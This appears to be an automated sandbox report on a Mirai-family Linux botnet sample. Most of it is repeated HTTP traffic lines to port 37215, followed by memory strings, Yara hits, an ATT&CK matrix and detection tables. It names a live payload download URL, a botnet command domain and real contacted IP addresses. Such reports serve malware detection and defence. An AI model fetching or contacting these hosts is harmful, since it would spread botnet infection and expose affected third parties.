                  Source: unknownNetwork traffic detected: HTTP traffic on port 34960 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37906 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48034 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43802 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52824 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54878 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50782 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57574 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34426 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39174 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42442 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53090 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36424 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34582 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47870 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43842 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43406 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52876 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45944 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36772 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48088 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60316 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45428 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43198 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42116 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60920 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57416 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59456 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45962 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42474 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51396 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53648 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35672 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54192 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49480 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44566 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54880 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46976 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37256 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48684 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52602 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38252 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34732 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59840 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46914 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56406 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46338 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43494 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58744 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56414 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43054 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39284 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38902 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56098 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40358 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34752 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36248 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36726 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45922 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45562 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55418 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46382 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60442 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49062 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57756 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54866 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56914 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57372 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33086 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41518 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45168 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54892 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40888 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40478 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35574 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51104 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55330 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41478 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41524 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42102 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34854 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48788 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34600 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55422 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43000 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41544 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58354 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35272 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54266 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50918 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35738 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58892 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55314 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51230 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43024 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53434 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38514 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42470 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52558 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47560 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45242 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51924 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47308 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35160 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40124 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37018 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37906 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40540 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39580 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46336 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37646 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58760 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36004 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55832 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44278 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59214 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41478 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43850 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53296 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56572 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44494 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56888 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39862 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34464 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58720 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46094 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51880 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36612 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32828 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54534 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45958 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37182 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59798 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42732 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44018 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46600 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59822 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36054 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45418 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52510 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60674 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39310 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57100 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59650 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53400 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60080 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44370 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60462 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48612 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56842 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54518 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40960 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32884 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38970 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55664 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37814 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40556 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53268 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42992 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52240 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57494 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45344 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34582 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59744 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47742 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47040 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47388 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60084 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55296 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36348 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55842 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38020 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41714 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45252 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51508 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35724 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37872 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36918 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50348 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54810 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59058 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49130 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47624 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53812 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52692 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44994 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42168 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34872 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47092 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45474 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53632 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54022 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59566 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57462 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58200 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59408 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36020 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56264 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44898 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51500 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44208 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34526 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39674 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47626 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40970 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59108 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55052 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47326 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58170 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35128 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44894 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60116 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43000 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43098 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35570 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35060 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36364 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35660 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41214 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60928 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59280 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35462 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44424 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33720 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58194 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34656 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50288 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48522 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38474 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55572 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43874 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37040 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36958 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35196 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56122 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54860 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51106 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40076 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58870 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51582 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35862 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58556 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45686 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54312 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37412 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48936 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45488 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60268 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48322 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46632 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39994 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41868 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42982 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44456 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56826 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43808 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34260 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42702 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40852 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56404 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54810 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38494 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56690 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50908 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58746 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57224 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60020 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33992 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56828 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57886 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48056 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46538 -> 37215
                  Source: /tmp/c0m5xRfolz.elf (PID: 5490)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/bin/xfdesktop (PID: 5519)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/bin/xfdesktop (PID: 5543)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/bin/xfdesktop (PID: 5549)Queries kernel information via 'uname': Jump to behavior
                  Source: /usr/bin/xfdesktop (PID: 5560)Queries kernel information via 'uname': Jump to behavior
                  Source: c0m5xRfolz.elf, 5490.1.00007ffef6159000.00007ffef617a000.rw-.sdmpBinary or memory string: 4x86_64/usr/bin/qemu-sh4/tmp/c0m5xRfolz.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/c0m5xRfolz.elf
                  Source: c0m5xRfolz.elf, 5490.1.00007ffef6159000.00007ffef617a000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
                  Source: c0m5xRfolz.elf, 5490.1.000055db640d9000.000055db6413c000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
                  Source: c0m5xRfolz.elf, 5490.1.000055db640d9000.000055db6413c000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: c0m5xRfolz.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: c0m5xRfolz.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTR
                  Source: Yara matchFile source: c0m5xRfolz.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: c0m5xRfolz.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: c0m5xRfolz.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTR
                  Source: Yara matchFile source: c0m5xRfolz.elf, type: SAMPLE
                  Source: Yara matchFile source: 5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: c0m5xRfolz.elf PID: 5490, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Scripting
                  Path Interception1
                  Hidden Files and Directories
                  1
                  OS Credential Dumping
                  11
                  Security Software Discovery
                  Remote ServicesData from Local System11
                  Non-Standard Port
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515013 Sample: c0m5xRfolz.elf Startdate: 21/09/2024 Architecture: LINUX Score: 100 26 157.44.166.64, 32495, 37215 RELIANCEJIO-INRelianceJioInfocommLimitedIN India 2->26 28 botnet.4gnekoland.top 2->28 30 99 other IPs or domains 2->30 32 Suricata IDS alerts for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 6 other signatures 2->38 8 c0m5xRfolz.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 xfce4-session xfdesktop 2->12         started        14 7 other processes 2->14 signatures3 process4 process5 16 c0m5xRfolz.elf 8->16         started        process6 18 c0m5xRfolz.elf 16->18         started        20 c0m5xRfolz.elf 16->20         started        22 c0m5xRfolz.elf 16->22         started        24 c0m5xRfolz.elf 16->24         started       

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  c0m5xRfolz.elf66%ReversingLabsLinux.Trojan.Mirai
                  c0m5xRfolz.elf68%VirustotalBrowse
                  c0m5xRfolz.elf100%AviraEXP/ELF.Mirai.Z.A
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  botnet.4gnekoland.top21%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://15.235.209.194/tajma.mpsl;100%Avira URL Cloudmalware
                  http://15.235.209.194/tajma.mpsl;0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  botnet.4gnekoland.top
                  unknown
                  unknowntrueunknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/soap/encoding/c0m5xRfolz.elffalse
                  • URL Reputation: safe
                  unknown
                  http://15.235.209.194/tajma.mpsl;c0m5xRfolz.elffalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://schemas.xmlsoap.org/soap/envelope/c0m5xRfolz.elffalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  41.3.237.89
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  137.200.183.16
                  unknownUnited States
                  11985ASN-SSAUSfalse
                  157.78.108.62
                  unknownJapan4725ODNSoftBankMobileCorpJPfalse
                  113.19.42.79
                  unknownIndia
